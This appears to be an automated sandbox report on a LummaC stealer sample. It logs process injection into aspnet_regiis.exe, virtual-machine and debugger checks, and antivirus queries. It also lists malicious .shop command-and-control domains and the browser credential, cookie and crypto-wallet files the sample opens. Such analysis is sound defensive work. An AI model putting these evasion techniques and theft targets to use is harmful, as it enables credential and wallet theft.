Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 5EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 5FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 6FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 7340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 8340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory allocated: 9340000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Window / User API: threadDelayed 6805

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7728	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7944	Thread sleep count: 6805 > 30			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Last function: Thread delayed

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941645039.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API call chain: ExitProcess graph end node

graph_2-13763

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027CD760 LdrInitializeThunk,

2_2_027CD760

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Code function: 0_2_6CE201CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE201CA

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE21955 mov eax, dword ptr fs:[00000030h]		0_2_6CE21955
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE22B29 mov eax, dword ptr fs:[00000030h]		0_2_6CE22B29

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Code function: 0_2_6CE2473C GetProcessHeap,

0_2_6CE2473C

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE1FCF1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CE1FCF1
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE201CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CE201CA
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE22B5A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CE22B5A

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 9cOUjp7ybm.exe	String found in binary or memory: rabidcowse.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: noisycuttej.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: tirepublicerj.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: framekgirus.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: wholersorie.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: abruptyopsn.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: nearycrepso.shop
Source: 9cOUjp7ybm.exe	String found in binary or memory: undesirabkel.click
Source: 9cOUjp7ybm.exe	String found in binary or memory: cloudewahsj.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2791000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D1000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D4000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27E2000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2791000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D1000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D4000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27E2000	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 24D0008	Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Code function: 0_2_6CE20398 cpuid

0_2_6CE20398

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Queries volume information: C:\Users\user\Desktop\9cOUjp7ybm.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Code function: 0_2_6CE1FE13 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CE1FE13

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941645039.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810028807.0000000002B40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000002.00000003.1796910856.0000000002B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3er
Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: aspnet_regiis.exe, 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
